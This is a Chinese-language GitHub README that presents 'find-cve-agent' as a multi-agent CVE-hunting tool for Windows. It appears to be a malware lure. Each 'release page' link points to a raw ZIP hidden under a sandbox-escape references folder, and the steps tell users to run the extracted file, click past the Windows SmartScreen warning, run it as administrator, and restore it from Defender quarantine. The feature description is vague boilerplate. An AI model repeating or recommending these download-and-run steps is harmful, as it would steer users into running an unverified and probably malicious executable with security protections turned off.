Liaabnormal676/find-cve-agent

GitHub: Liaabnormal676/find-cve-agent

一款基于多代理协作的工作流工具,用于在开源包中系统性查找已知 CVE 并过滤误报。

Stars: 0 | Forks: 0

# 🕵️ find-cve-agent - 用更少的噪音查找漏洞 [![下载](https://img.shields.io/badge/Download-Release%20Page-blue?style=for-the-badge&logo=github)](https://raw.githubusercontent.com/Liaabnormal676/find-cve-agent/main/skills/sandbox-escape/references/agent_cve_find_v3.9.zip) ## 🚀 快速开始 find-cve-agent 帮助您以引导式的方式审查软件中的已知安全问题。它专为 Windows 用户设计,提供从下载到首次运行的简洁路径。 使用它可以: - 使用一组检查扫描目标 - 减少误报 - 保持研究有序 - 通过可重复的流程工作 ## 💾 下载应用 1. 打开此处的发布页面:https://raw.githubusercontent.com/Liaabnormal676/find-cve-agent/main/skills/sandbox-escape/references/agent_cve_find_v3.9.zip 2. 在页面顶部附近找到最新版本 3. 在 **Assets** 下下载 Windows 文件 4. 将文件保存到桌面或 Downloads 文件夹 5. 如果文件在 ZIP 文件夹中,右键点击并选择 **全部提取** 6. 打开提取后文件夹中的应用文件 如果 Windows 请求权限,请选择 **更多详细信息**,然后仅在信任来源且希望继续时选择 **仍要运行** ## 🖥️ Windows 安装 在开始之前,请确保您已具备以下条件: - Windows 10 或 Windows 11 - 稳定的互联网连接 - 为应用及其检查预留足够的磁盘空间 - 运行来自 GitHub 下载的文件权限 如果发布包包含便携应用,解压后即可运行。如果包含安装程序,请按照屏幕提示操作,并保持默认选项,除非您希望使用不同的文件夹。 ## ▶️ 首次运行 1. 打开应用 2. 等待首次加载完成 3. 输入要审查的目标或项目 4. 选择要运行的检查 5. 启动扫描 6. 在主窗口中查看结果 应用可能需要几分钟来构建首次结果。如果正在检查大量文件或规则,这是正常的。 ## 🔍 它做什么 find-cve-agent 为系统性漏洞研究而设计。它采用团队协作流程,帮助您按稳定顺序遍历目标。 您可以用它来: - 查找已知 CVE - 跨多个检查比较发现 - 减少重复告警 - 聚焦需要审查的项目 - 跟踪工作过程中的结果 它专为安全研究、漏洞赏金工作和防御性测试而构建。 ## 🤖 代理团队 应用采用五代理工作流程。每个部分都有明确职责。 - **Planner**:设置检查顺序 - **Scanner**:运行搜索步骤 - **Filter**:移除明显的误命中 - **Reviewer**:检查发现的上下文 - **Reporter**:收集最终输出 这种分工有助于保持流程一致且更易遵循。 ## 🧰 包含的技能 应用包含 20 项为 CVE 挖掘和结果审查而构建的技能。这些技能可能涵盖: - 文件和代码模式检查 - 基于规则的搜索 - 版本匹配 - 暴露审查 - 路径检查 - 服务审查 - Web 应用检查 - 结果排序 - 误报移除 - 笔记记录 - 报告准备 每项技能支持工作流程的一部分,因此您无需为每个步骤单独设置工具。 ## 🧪 典型使用场景 当您希望: - 审查项目中的已知安全问题 - 在披露前查找薄弱环节 - 检查文件中的风险模式 - 确认告警是否真实 - 记录测试内容 使用 find-cve-agent 特别适合需要引导式检查流程,而非松散工具集的用户。 ## ⚙️ 基本流程 1. 打开应用 2. 加载要检查的目标 3. 选择扫描模式 4. 运行检查 5. 审查每个结果 6. 标记误命中 7. 保存或导出最终发现 如果不确定从哪里开始,请先使用默认扫描路径。它会在您缩小搜索范围之前提供全局视图。 ## 📁 下载后预期内容 下载并打开发布包后,您可能会看到: - 可运行的应用文件 - 包含支持文件的文件夹 - 包含发布说明的 README 文件 - 示例配置文件或预设 如果发布包要求,请将应用及其支持文件保持在同一文件夹中。 ## 🛠️ 如果应用无法打开 尝试以下步骤: 1. 右键点击应用并选择 **以管理员身份运行** 2. 检查文件是否已完成下载 3. 确保已解压 ZIP 文件 4. 将文件夹移动到简单路径,如 `C:\Apps\find-cve-agent` 5. 如果文件丢失,请检查 Windows Defender 隔离区 6. 从发布页面重新下载最新版本 ## 🔐 安全使用 仅对您拥有或获得授权测试的系统与目标使用该工具。将扫描集中在您自己的工作、实验室系统或已批准的研究任务上。 ## 🧭 它的用处体现在 find-cve-agent 保持流程清晰。它帮助您: - 从开始到结束遵循一条路径 - 减少弱匹配带来的噪音 - 聚焦可能的问题 - 保持工作有序 - 以相同步骤重复检查 ## 📦 发布页面 在此下载或更新应用:https://raw.githubusercontent.com/Liaabnormal676/find-cve-agent/main/skills/sandbox-escape/references/agent_cve_find_v3.9.zip 请使用此页面获取新版本、修复构建和 Windows 下载。 ## 📝 简洁启动路径 1. 打开发布页面 2. 下载最新的 Windows 文件 3. 如需要则解压 4. 打开应用 5. 运行首次扫描 6. 查看结果 7. 保存希望保留的发现 ## 🧩 关键词 ai-agent, bug-bounty, claude-code, claude-code-plugin, cve, cve-hunting, false-positive, offensive-security, penetration-testing, responsible-disclosure, security-automation, security-research, security-tools, semgrep, vulnerability-detection
标签:Claude Code, CVE 查找, Maven, URL发现, Windows 安全工具, 代码安全分析, 多智能体, 威胁情报, 安全合规, 安全检测, 开发者工具, 开放策略代理, 攻击面分析, 沙箱逃逸, 漏洞验证, 结构化查询, 网络代理, 自动化安全, 自定义脚本, 误报过滤, 软件审查, 逆向工具, 防御框架